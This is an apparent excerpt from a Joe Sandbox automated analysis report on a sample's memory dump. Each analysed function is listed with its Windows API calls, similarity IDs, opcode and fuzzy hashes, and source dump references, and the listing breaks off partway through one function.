                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcd69f412060586ba97ddd78fff4b9fa5cc95ccc5ac11bec68fb74a3b9fb5f90
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B20152E1600709BBDB1466255C82EEB735D9E52399B404025FE0D9B3C1F7ADED58C2E1
                                                                                                                                                                                                                                                                              Function 0075E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0075E328
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 0075E32F
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0075E345
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 0075E34C
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0075E390
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 0075E36D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                              • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                              • Opcode ID: d599489b1973316da576ef68234a755fd4c353c4d8fba775edf3364e1073b5bd
                                                                                                                                                                                                                                                                              • Instruction ID: 2e1b3b17a0c51f504eb3dddabd8c68a1ee25f4b14bc1c1329078a2f6bbaf8aa3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d599489b1973316da576ef68234a755fd4c353c4d8fba775edf3364e1073b5bd
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC01A9F294020C7FE721ABA4CD8DEE7776CDB08341F1185A1B705E6081F6789E888B75
                                                                                                                                                                                                                                                                              Function 00761312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00761322
                                                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?), ref: 00761334
                                                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,000001F6), ref: 00761342
                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00761350
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0076135F
                                                                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0076136F
                                                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00761376
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                              • Opcode ID: e62f838c66e0d3e0db84c09ba8e9a9d19c6d5cfca276cdeaa1c9b073d878152f
                                                                                                                                                                                                                                                                              • Instruction ID: 174f0a729dd21aaefc7c9b0599f8e0c418e8c5a93eebb2c5ef90bad64eee42af
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e62f838c66e0d3e0db84c09ba8e9a9d19c6d5cfca276cdeaa1c9b073d878152f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF0C932082612ABD7612B95EE4DBD6BB39BF05312F945121F102918E097789861DF98
                                                                                                                                                                                                                                                                              Function 007726BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0077281D
                                                                                                                                                                                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0077283E
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 0077284F
                                                                                                                                                                                                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00772938
                                                                                                                                                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 007728E9
                                                                                                                                                                                                                                                                                • Part of subcall function 0075433E: _strlen.LIBCMT ref: 00754348
                                                                                                                                                                                                                                                                                • Part of subcall function 00773C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0076F669), ref: 00773C9D
                                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00772992
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                              • Opcode ID: b9722ade16ebb641d80b5ae8a17e29ddb0c091ba561b43b8dcfdaa1c2ae60da6
                                                                                                                                                                                                                                                                              • Instruction ID: b04e540bf02a2ae5d0c17839947e3e3eafa45b7dfa63146fce13c4985b28043b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9722ade16ebb641d80b5ae8a17e29ddb0c091ba561b43b8dcfdaa1c2ae60da6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3B1FF31604300AFD724DF24C885E2ABBE5AF84358F94854CF56A4B2E3DB75ED86CB91
                                                                                                                                                                                                                                                                              Function 00720527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 0072042A
                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00720446
                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 0072045D
                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0072047B
                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00720492
                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007204B0
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                              • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                              • Instruction ID: 2c598a40381f2492768444f96f4bdf7be1bc6ccd73234e1178452827bf539725
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27810B71600769DBE720EE69EC45B6EB3E9AF45320F24812EF511D7683E778D90087E4
                                                                                                                                                                                                                                                                              Function 00726571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00718649,00718649,?,?,?,007267C2,00000001,00000001,8BE85006), ref: 007265CB
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007267C2,00000001,00000001,8BE85006,?,?,?), ref: 00726651
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0072674B
                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00726758
                                                                                                                                                                                                                                                                                • Part of subcall function 00723B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A79,?,0000015D,?,?,?,?,007185B0,000000FF,00000000,?,?), ref: 00723BC5
                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00726761
                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00726786
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                              • Opcode ID: 26e7ba2eb6ceeadd7976d5e5afe8be45ad350a317c02d9b098e26d4e912c6d98
                                                                                                                                                                                                                                                                              • Instruction ID: 6e3d56fb385cdf25a7ddcc4b5bbd87e71650203c05bf12a00463513a94a3ca9e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26e7ba2eb6ceeadd7976d5e5afe8be45ad350a317c02d9b098e26d4e912c6d98
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951E672600226AFEB258F64FC85EBB77AAEF40714F15466AFC04D6240EB3DDC5086A0
                                                                                                                                                                                                                                                                              Function 0077C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C10E,?,?), ref: 0077D415
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D451
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4C8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4FE
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C72A
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C785
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077C7CA
                                                                                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0077C7F9
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077C853
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0077C85F
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                              • Opcode ID: 71e78cc43e0062c19f10cd7ef48cd6b75cd4042a809d608f1144ce1c24e69e4d
                                                                                                                                                                                                                                                                              • Instruction ID: e01c3b4cedf82c1fd68e60b78abc662d520b270264a26ef44c7d1f42e163365a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71e78cc43e0062c19f10cd7ef48cd6b75cd4042a809d608f1144ce1c24e69e4d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7281CF70208245EFCB15DF24C885E2ABBE5FF88348F14889CF5594B2A2DB35ED45CB92
                                                                                                                                                                                                                                                                              Function 0075009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000035), ref: 007500A9
                                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00750150
                                                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(00750354,00000000), ref: 00750179
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(00750354), ref: 0075019D
                                                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(00750354,00000000), ref: 007501A1
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007501AB
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                              • Opcode ID: 3c1586733a7c91c6ba8289308a1349cbf8b5b4dcd567d3671910d1192a7854e2
                                                                                                                                                                                                                                                                              • Instruction ID: 4547bb4926b292be33391d8d9a78c5e0fc8dd0d3267abf4979df133ab4d0c3f6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c1586733a7c91c6ba8289308a1349cbf8b5b4dcd567d3671910d1192a7854e2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C51FC31540314EACF20AB649889BA973A5FF45312F249446ED09DF1D6DBF89C88CBD6
                                                                                                                                                                                                                                                                              Function 00766ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00766F21
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0076707E
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00790CC4,00000000,00000001,00790B34,?), ref: 00767095
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00767319
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                                                                                                                              • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                              • Opcode ID: 040d3d07dd3e9f0105d6179dc5e53991de38b5c9c9332a8ebe890f4fa5e1d24b
                                                                                                                                                                                                                                                                              • Instruction ID: 980d2e5ebf8c349df84737879bb17caa2da30698b95f3eb8f4796d17c208eaeb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 040d3d07dd3e9f0105d6179dc5e53991de38b5c9c9332a8ebe890f4fa5e1d24b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74D16971508205AFC344EF24C881D6BB7E9FF88748F40496DF5868B2A2DB71ED45CB92
                                                                                                                                                                                                                                                                              Function 00761196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 007611B3
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 007611EE
                                                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0076120A
                                                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00761283
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0076129A
                                                                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 007612C8
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                              • Opcode ID: 9372c3e7181b7a0255f5d845d2d5943f0e7e50e81aa7d2e9cec5166c838d7860
                                                                                                                                                                                                                                                                              • Instruction ID: b0234585444b2c36059c2b1a2187c242eca5eebfafd86da7c604585dd79e366e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9372c3e7181b7a0255f5d845d2d5943f0e7e50e81aa7d2e9cec5166c838d7860
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA417271A00208EFDF149F54DC89AAAB7B8FF04310F5480A5EE019F296D778DE91DBA4
                                                                                                                                                                                                                                                                              Function 00788C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0074FBEF,00000000,?,?,00000000,?,007339E2,00000004,00000000,00000000), ref: 00788CA7
                                                                                                                                                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00788CCD
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00788D2C
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00788D40
                                                                                                                                                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00788D66
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00788D8A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 642888154-0
                                                                                                                                                                                                                                                                              • Opcode ID: 58622b38ba14eaf3cafa5f28ca60458c0595b2cb527c74c7fbf8e6fb63556f1e
                                                                                                                                                                                                                                                                              • Instruction ID: 09039f4e8d7e897168622dafa34e06d5ddd11625be034580e94225b0adf0c298
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58622b38ba14eaf3cafa5f28ca60458c0595b2cb527c74c7fbf8e6fb63556f1e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A341E630641644AFDB65EF24C889FA17BF0FB49304F5440A9E5085B2A3CB796846CB75
                                                                                                                                                                                                                                                                              Function 00772D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00772D45
                                                                                                                                                                                                                                                                                • Part of subcall function 0076EF33: GetWindowRect.USER32(?,?), ref: 0076EF4B
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00772D6F
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00772D76
                                                                                                                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00772DB2
                                                                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00772DDE
